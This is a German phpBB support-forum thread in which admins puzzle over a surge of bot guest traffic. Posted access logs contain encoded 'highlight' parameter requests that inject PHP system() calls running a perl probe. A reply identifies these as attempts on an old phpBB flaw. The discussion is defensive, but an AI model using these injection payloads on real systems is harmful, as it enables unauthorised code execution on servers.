"lesbians"-Spam-Attacke

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
stei109
Mitglied
Beiträge: 144
Registriert: 13.02.2004 16:14
Wohnort: Austria

Beitrag von stei109 »

larsneo hat geschrieben: spass beiseite: wie soll man gastzugriffe von bots unterbinden solange es kein definiertes merkmal gibt, dass sie von normalen gastzugriffen (die in aller regel ja wohl erlaubt sein sollen) unterscheidet?
Hi!
Kann man wohl nicht unterbinden, aber warum sollen Gastzugriffe in aller Regel erlaubt sein ?
Hatte ich bis dato auch, aber ich lass mir mein Forum nicht zuspammen und mißbrauchen - also bleibt nur mehr der weg über die Registrierung.
Das hält solche Idioten fürs erste ab.
Benutzeravatar
niffi
Mitglied
Beiträge: 185
Registriert: 09.03.2003 22:02

Beitrag von niffi »

larsneo hat geschrieben:ich sagte logfiles (und nichts statistik) :roll:
erklär' mir aber bitte aber auch noch einmal genau, was du eigentlich erreichen willst.
also: mein websitecounterzeigt an das in etwa 10 minuten ca. 20 leute zugegriffen haben, in der gleichen zeit schwankt aber die zahl der gäste im forum zwischen 30 und 70 (!) und das ständig. ist aber erst seid 2 tagen so. gut ich hatte vorher "acid´s whos online" hack nicht drauf, aber selbst wenn ich die seite in den zustand davor zurückversetze, tritt der fehler auf.

ist einfach unwahrscheinlich das pötzlich 40 oder 50 gäste städnig online sind, wo frühr max. mit regUsern nur 20 da waren.

Und wenn ich als Admin mir die IPs ansehe, sind auch einige doppelt (meist taucht die gleiche IP 2 oder 3 mal auf)...
Mögt ihr diese Signaturen? Ich nicht.
DocSnyder
Mitglied
Beiträge: 30
Registriert: 13.06.2002 21:42

Beitrag von DocSnyder »

Ich habe jetzt logfiles. Leider kann ich damit nicht soviel anfangen.
Aber komisch siehts aus ;)

Code: Alles auswählen

216.55.xxx.xx - - [18/Feb/2005:13:11:01 +0100] "GET 
/viewtopic.php?t=2769&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252
Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(3
4)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr
(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%
252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 
302 - "-" "Mozilla/4.0"

212.18.xx.x - - [18/Feb/2005:13:11:03 +0100] "GET 
/viewtopic.php?t=2739&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252
Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(3
4)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr
(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%
252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 
86202 "-" "Mozilla/4.0"

212.18.xx.xxx - - [18/Feb/2005:13:11:16 +0100] "GET 
/viewtopic.php?p=125048&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%2
52Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr
(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Ec
hr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111
)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 
200 87382 "-" "Mozilla/4.0"


Benutzeravatar
niffi
Mitglied
Beiträge: 185
Registriert: 09.03.2003 22:02

Beitrag von niffi »

ja hilft mir leider nicht richtig weiter.... :cry:
Mögt ihr diese Signaturen? Ich nicht.
701
Mitglied
Beiträge: 121
Registriert: 29.08.2002 13:23

Beitrag von 701 »

habe seit ca. 7 Uhr auch massives "Gastaufkommen" wobei die stosszeiten bei 81 Usern lag, jedoch keine schäden oder minderung der Serverleistung.
Benutzeravatar
larsneo
Mitglied
Beiträge: 2622
Registriert: 07.03.2002 15:23
Wohnort: schwäbisch gmünd
Kontaktdaten:

Beitrag von larsneo »

Code: Alles auswählen

highlight=%2527
ist der versuch, die pre-2.0.11 schwachstelle auszunutzen. bei aktuellen boards passiert dadurch definitiv nichts. als zusätzlichen schutz vor traffic habe ich *hier* schon vor geraumer zeit eine .htaccess gepostet.
gruesse aus dem wilden sueden
larsneo
..::[krapohl.net]::..
Benutzeravatar
niffi
Mitglied
Beiträge: 185
Registriert: 09.03.2003 22:02

Beitrag von niffi »

so, 16:14 Uhr -> seit etwa 30 min hat sich es bei mir wieder eingepegelt auf 8-10 Gäste.... ist bei mir normal.

wer weiß was da loswar......

was soll das ändern der .htaccess bringen?

@701: ich hab heute mit 78 Usern auch nen neuen rekord aufgestellt.... :o :(
Mögt ihr diese Signaturen? Ich nicht.
stei109
Mitglied
Beiträge: 144
Registriert: 13.02.2004 16:14
Wohnort: Austria

Beitrag von stei109 »

Was da genau abläuft, weiß ich auch nicht (hätte den Link im betreffenden Posting doch speichern sollen.)
Fakt ist, dass genau auf den Forumseintrag verlinkt wird und das die "Besucher" dorthin zieht.
Was das soll, weiß ich auch nicht :roll:
Benutzeravatar
larsneo
Mitglied
Beiträge: 2622
Registriert: 07.03.2002 15:23
Wohnort: schwäbisch gmünd
Kontaktdaten:

Beitrag von larsneo »

niffi hat geschrieben:was soll das ändern der .htaccess bringen?
larsneo hat geschrieben:als zusätzlichen schutz vor traffic[...]
gruesse aus dem wilden sueden
larsneo
..::[krapohl.net]::..
Benutzeravatar
niffi
Mitglied
Beiträge: 185
Registriert: 09.03.2003 22:02

Beitrag von niffi »

den link zu finden, sollte eine herausforderung sein :cry:
Mögt ihr diese Signaturen? Ich nicht.
Antworten

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“